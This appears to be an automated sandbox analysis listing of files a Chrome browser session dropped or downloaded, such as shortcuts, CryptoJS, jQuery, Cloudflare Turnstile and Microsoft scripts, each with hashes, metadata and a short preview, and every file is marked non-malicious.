                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2689
                                                                              Entropy (8bit):4.002250493182438
                                                                              Encrypted:false
                                                                              SSDEEP:48:8QdfTXnAHuidAKZdA14meh7sFiZUkmgqeh7ssy+BX:8ED/nSy
                                                                              MD5:09FCC2B99B98D9EFF7B84208C04239E2
                                                                              SHA1:7CA47F687ACD1EDACC6D394664F76B29F5D68E01
                                                                              SHA-256:9AE88A0FC35C6BC227FE56DD9132B332473CE452438CE96423F6E1612B2C7A5F
                                                                              SHA-512:6D2DE0B2827A562A6EAE2944E90F19147D16DD7EBFF1F3C30E74C1F91DA16D5218B49F2FD6E959C11FF384AEC79D0159F75CA54ED99D77962037DDAD3E8AA25C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yfr....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ynr....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ynr....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ynr..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............na......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 13:19:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2677
                                                                              Entropy (8bit):3.988401155063545
                                                                              Encrypted:false
                                                                              SSDEEP:48:80dfTXnaHuidAKZdA1TehDiZUkwqehKy+R:8ADWEy
                                                                              MD5:666AC74EBB11D2285C483BFD50E42E56
                                                                              SHA1:5024606F9FE2EBB08731AE0ADE860776B21E0D4F
                                                                              SHA-256:138D5103D0428D014465CA4C9445231AB72AA20C40AC2448DA85441C568AE2E4
                                                                              SHA-512:185780C892BEE9E29A03625A914170211086BEFF0D6CD719B0BDAFFF847A9AE53508C10392003A7437195B0A64D6AA16B97B93D52ACEC3FD60CEBEC40C0AAD0F
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.....a...K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yfr....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ynr....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ynr....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ynr..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yor...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............na......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 13:19:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2677
                                                                              Entropy (8bit):3.980600212705003
                                                                              Encrypted:false
                                                                              SSDEEP:48:8ldfTXnaHuidAKZdA1dehBiZUk1W1qehgy+C:8XDW9Ay
                                                                              MD5:C7348443646F52532DED0693E96EB933
                                                                              SHA1:1A4AE9AA156563D4462315E17FED8B2A6E11DEE0
                                                                              SHA-256:2C70BE8101BAA90FD3C737326262B2A5884FBDDAB37E288FE4C296544E5FA06E
                                                                              SHA-512:46BA6B3E0946E5494B58ABF8CA7DAA5184C1065DFADAEEBF4E0A30C22E9406EAB0A51EB19FE2A70AEC6E8A4996D6AB8B8B486161D83AE2416651BB7DBB2A10AA
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,.........K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yfr....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ynr....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ynr....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ynr..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yor...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............na......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 11 13:19:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                              Category:dropped
                                                                              Size (bytes):2679
                                                                              Entropy (8bit):3.987874289496296
                                                                              Encrypted:false
                                                                              SSDEEP:48:8wdfTXnaHuidAKZdA1duTeehOuTbbiZUk5OjqehOuTbSy+yT+:8kDsTfTbxWOvTbSy7T
                                                                              MD5:62F2F261550B8ACBCFE91A1171848BBF
                                                                              SHA1:4F1AA2F15FB2378E5AA94EA13C2E63891ABF8639
                                                                              SHA-256:3D8E13C2149E691D7C480EBDB097764CFE4B486416585FB47FC69899DCE4DAFB
                                                                              SHA-512:F345A30BE89B87E39BF6334F6DA396F8EBF8B2B1EDC73E41F3181498E939F2337E290007E0C4B25623CF817A183BDDA52491EBBF3C032FFBADFA06C1455853DA
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:L..................F.@.. ...$+.,....xv...K..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yfr....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ynr....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ynr....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ynr..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yor...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............na......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):48316
                                                                              Entropy (8bit):5.6346993394709
                                                                              Encrypted:false
                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):4054
                                                                              Entropy (8bit):7.797012573497454
                                                                              Encrypted:false
                                                                              SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                              MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                              SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                              SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                              SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 98 x 93, 8-bit/color RGB, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):61
                                                                              Entropy (8bit):4.035372245524405
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPlNGpMl8kxl/k4E08up:6v/lhP+pk8k7Tp
                                                                              MD5:AD2BF08E909CB9F989C7BADBF87006CE
                                                                              SHA1:05E8412EFBA014BF06DAC17941F8121C5D4D6C17
                                                                              SHA-256:12BF9CC8C45B62C86354CD7FA4E2B3A3CE93B2DC28F1430B953699506B58D5E6
                                                                              SHA-512:3A7DAFC24D515A3214B25D410ABB6EF25107509142AE0BBCB53EEADB87AFEB29D49BA551D8C2280C2689A523DEBCDFEB0B311A6615B4692A992AB5732FE47117
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8f061c7f6a0e43aa/1733926788305/RiSF0WxLge_mIxD
                                                                              Preview:.PNG........IHDR...b...].......$!....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (513), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):513
                                                                              Entropy (8bit):5.350826451115093
                                                                              Encrypted:false
                                                                              SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                              MD5:602C381194795DFC124FACDF48492EF1
                                                                              SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                              SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                              SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
                                                                              Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.990210155325004
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 98 x 93, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):61
                                                                              Entropy (8bit):4.035372245524405
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPlNGpMl8kxl/k4E08up:6v/lhP+pk8k7Tp
                                                                              MD5:AD2BF08E909CB9F989C7BADBF87006CE
                                                                              SHA1:05E8412EFBA014BF06DAC17941F8121C5D4D6C17
                                                                              SHA-256:12BF9CC8C45B62C86354CD7FA4E2B3A3CE93B2DC28F1430B953699506B58D5E6
                                                                              SHA-512:3A7DAFC24D515A3214B25D410ABB6EF25107509142AE0BBCB53EEADB87AFEB29D49BA551D8C2280C2689A523DEBCDFEB0B311A6615B4692A992AB5732FE47117
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.PNG........IHDR...b...].......$!....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):48316
                                                                              Entropy (8bit):5.6346993394709
                                                                              Encrypted:false
                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65447)
                                                                              Category:dropped
                                                                              Size (bytes):89501
                                                                              Entropy (8bit):5.289893677458563
                                                                              Encrypted:false
                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (513), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):513
                                                                              Entropy (8bit):5.350826451115093
                                                                              Encrypted:false
                                                                              SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                              MD5:602C381194795DFC124FACDF48492EF1
                                                                              SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                              SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                              SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (47691)
                                                                              Category:downloaded
                                                                              Size (bytes):47692
                                                                              Entropy (8bit):5.401573598696506
                                                                              Encrypted:false
                                                                              SSDEEP:768:IXCtQmIutwVHBzZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUvnw81KZLGcD:IGJWHBzZBF6xbGeLsVvQ33FUvDW
                                                                              MD5:B0B3774E70E752266B4CF190E6D95053
                                                                              SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                                              SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                                              SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.js
                                                                              Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (41651)
                                                                              Category:dropped
                                                                              Size (bytes):131537
                                                                              Entropy (8bit):5.2237799798561975
                                                                              Encrypted:false
                                                                              SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                              MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                              SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                              SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                              SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):201253
                                                                              Entropy (8bit):2.661810841903416
                                                                              Encrypted:false
                                                                              SSDEEP:768:W7nJSq9GinOo20uqxjr3+AKyKEAPNPPn8P9R/3htzAVT+JcYY5WRItsWc7rQ3S01:WHGiOoHuOjr3+AKyKAXS
                                                                              MD5:85DE642E1467807F64F7E10807DF3869
                                                                              SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                              SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                                              SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage
